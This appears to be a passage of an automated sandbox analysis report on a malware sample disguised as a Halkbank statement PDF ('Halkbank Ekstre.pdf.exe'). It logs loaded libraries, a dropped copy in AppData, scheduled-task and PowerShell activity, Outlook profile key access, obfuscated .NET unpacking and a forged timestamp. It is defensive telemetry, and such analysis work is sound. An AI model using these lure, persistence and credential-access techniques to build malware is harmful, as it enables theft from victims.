Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Halkbank Ekstre.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Halkbank Ekstre.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Halkbank Ekstre.pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: srmB.pdb source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr
Source:	Binary string: srmB.pdbSHA256 source: Halkbank Ekstre.pdf.exe, uAHDaCgpWpsogA.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Halkbank Ekstre.pdf.exe.6a70000.5.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	.Net Code: qXZpoaIYZd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Halkbank Ekstre.pdf.exe.4298e58.3.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	.Net Code: qXZpoaIYZd System.Reflection.Assembly.Load(byte[])
Source: 0.2.Halkbank Ekstre.pdf.exe.3823dc8.0.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Halkbank Ekstre.pdf.exe.3843de8.4.raw.unpack, MainForm.cs	.Net Code: _206D_206A_206B_200E_200F_206F_206E_200C_200F_202B_202E_206A_200C_202A_200C_206D_200C_206F_200C_206E_202E_200B_202B_200D_206C_206C_200E_200D_200D_200F_206D_206F_206A_206F_200D_206C_202C_206D_206C_206C_202E System.Reflection.Assembly.Load(byte[])

Source: Halkbank Ekstre.pdf.exe

Static PE information: 0xB57AE987 [Fri Jun 25 22:41:11 2066 UTC]

Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_06A708BC push ecx; ret	0_2_06A708BD
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_06A73EFD push ebx; iretd	0_2_06A73EFF
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_06A71181 push dword ptr [69202F34h]; ret	0_2_06A711A6
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_06A71BD9 push ss; ret	0_2_06A71BDA
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 0_2_025C727C push ecx; iretd	0_2_025C7257
Source: C:\Users\user\Desktop\Halkbank Ekstre.pdf.exe	Code function: 9_2_06FF9241 push es; ret	9_2_06FF9244
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B2788 push 080599BBh; iretd	10_2_059B278D
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B5DD3 push ecx; ret	10_2_059B5DD4
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_059B4C98 pushfd ; iretd	10_2_059B4CA1
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 10_2_076ABE19 push 00076E16h; retf	10_2_076ABE25
Source: C:\Users\user\AppData\Roaming\uAHDaCgpWpsogA.exe	Code function: 17_2_017D9C30 push esp; retf 0185h	17_2_017D9D55

Source: Halkbank Ekstre.pdf.exe	Static PE information: section name: .text entropy: 7.601026158908665
Source: uAHDaCgpWpsogA.exe.0.dr	Static PE information: section name: .text entropy: 7.601026158908665

Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, wvGf3HMMix1iG68Ks1m.cs	High entropy of concatenated method names: 'i9mmAokSbD', 'zmxmzWkV03', 'hvLPL2X4hs', 'wn0PMDUiEb', 'pvWP4JqsND', 'XPUPw9fdfE', 'NE1PpdQikZ', 'CnFP9WOAb7', 'KufPUqfSQ0', 'zr3PNHLJx0'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, pLBtrKsqsc2mU2nMSg.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'eD64tw6Dqh', 'vFf4AnF7VA', 'HBh4zZbUn9', 'huuwLq4DNK', 'cbDwMSmaSB', 'w06w4siPHJ', 'm0RwwCJLon', 'ylgdnwyIsYdbCtvl0lx'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, fskFMTQvUvBKdNLjaa.cs	High entropy of concatenated method names: 'bXANO8jJwS', 'vtuNypLtY5', 'gMXNa35g3U', 'xJINub13wV', 'GPeNkcgc3B', 'mWINnby8S0', 'Qx4N83X2fT', 'Dd9N5h3Ku0', 'AQZNt1gcoy', 'jYTNA2AUYj'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, HbgmRAcbd9UriixnOC.cs	High entropy of concatenated method names: 'keAJGTFcaH', 'GRSJb4UL5l', 'GjEs22gWi8', 'aeMs0jPLvI', 'HHfshuvP2y', 'J6Ys1jsQ4v', 'UJ0srP0NTL', 'EvHsY7Ye3I', 'qpJsVHU36m', 'tEdsTuFVrL'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, AiuqfvA7tCsZt0nIOj.cs	High entropy of concatenated method names: 'L4NmslLO6O', 'VELmJQnByG', 'VoNmRSDKoM', 'wWNmliiYMG', 'gB7mH4Zg1q', 'lx0mZRorNV', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, s7Ir7irVkHNL8Hrwru.cs	High entropy of concatenated method names: 'ITYlUbX8ic', 'G1Mls5odT0', 'hHflRQMKgv', 'V7JRA4u0Fy', 'iv6RzRxwMq', 'xf4lLnsZAT', 'dwplMZiHON', 'nuKl44678N', 'Q8ilw1QsPJ', 'TfAlp7MMLc'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, XkGl3dOC5iY8CCvPpO.cs	High entropy of concatenated method names: 'WbfvTBjRf6', 'x0JvqNKB6o', 'X29vOm89YW', 'vwJvykUt1T', 'EO3vdKTZoC', 'aynv2sZNmi', 'F0Hv0VtCY6', 'YWtvhmUeXI', 'JTCv11CdD9', 'KN4vr5beOX'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, WkKyK7nbTK5CdCEUPp.cs	High entropy of concatenated method names: 'eWmK5kENPm', 'CofKAXJU6Y', 'yLU3LiLVaD', 'ueT3Mk8EKB', 'uLeKgqd8OL', 'wsxKqT5DPd', 'vwZKEgjNPI', 'sFwKO4pnse', 'CePKywaSex', 'o6IKaypFec'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, MYu4xHtDfEfRW8jrOZ.cs	High entropy of concatenated method names: 'lQYHfOqfLN', 'VQsHdS2EUZ', 'mfrH2GGiKb', 'VgqH0gUkOs', 'mneHhi7fym', 'kPGH104ORT', 'KgCHrRsN0U', 'OAEHYIobCv', 'fP6HVNtOXc', 'Py7HTESqqG'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, DZPgcIVA8ODdlPkZxD.cs	High entropy of concatenated method names: 'AbilWOOxhg', 'umilIoe9Ok', 'WAelo4F7bB', 'aC0lSRlOj8', 'XBclGbBt9w', 'ceVlChU8qm', 'fUnlbBnCTi', 'd1jlQHJ8Kp', 'WwjlBPb25S', 'D0klcTxxTk'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, MssHojpeKv8VN6JGBo.cs	High entropy of concatenated method names: 'LBUMlskFMT', 'oUvMZBKdNL', 'KIwM7r0mXe', 'XELMFg2bgm', 'wxnMvOCEim', 'GgFM6nGpuG', 'ek1ymOOXNo7Sk1YnJ8', 'VRBouH2RZ9hdD54oPk', 'e1IMMAIEll', 'W2SMwp9jup'
Source: 0.2.Halkbank Ekstre.pdf.exe.4320e78.2.raw.unpack, VyF3LrZTnRfCPUYiQo.cs	High entropy of concatenated method names: 'SfLw9SatMy', 'JTTwUASRFG', 'xIjwNWcFms', 'JPAwsnG8dk', 'ENqwJXEZFP', 'KDTwRHFFOu', 'SPuwl1fasL', 'So8wZTPvrk', 'lj7wXc8Nnk', 'TY5w7c4dkZ'
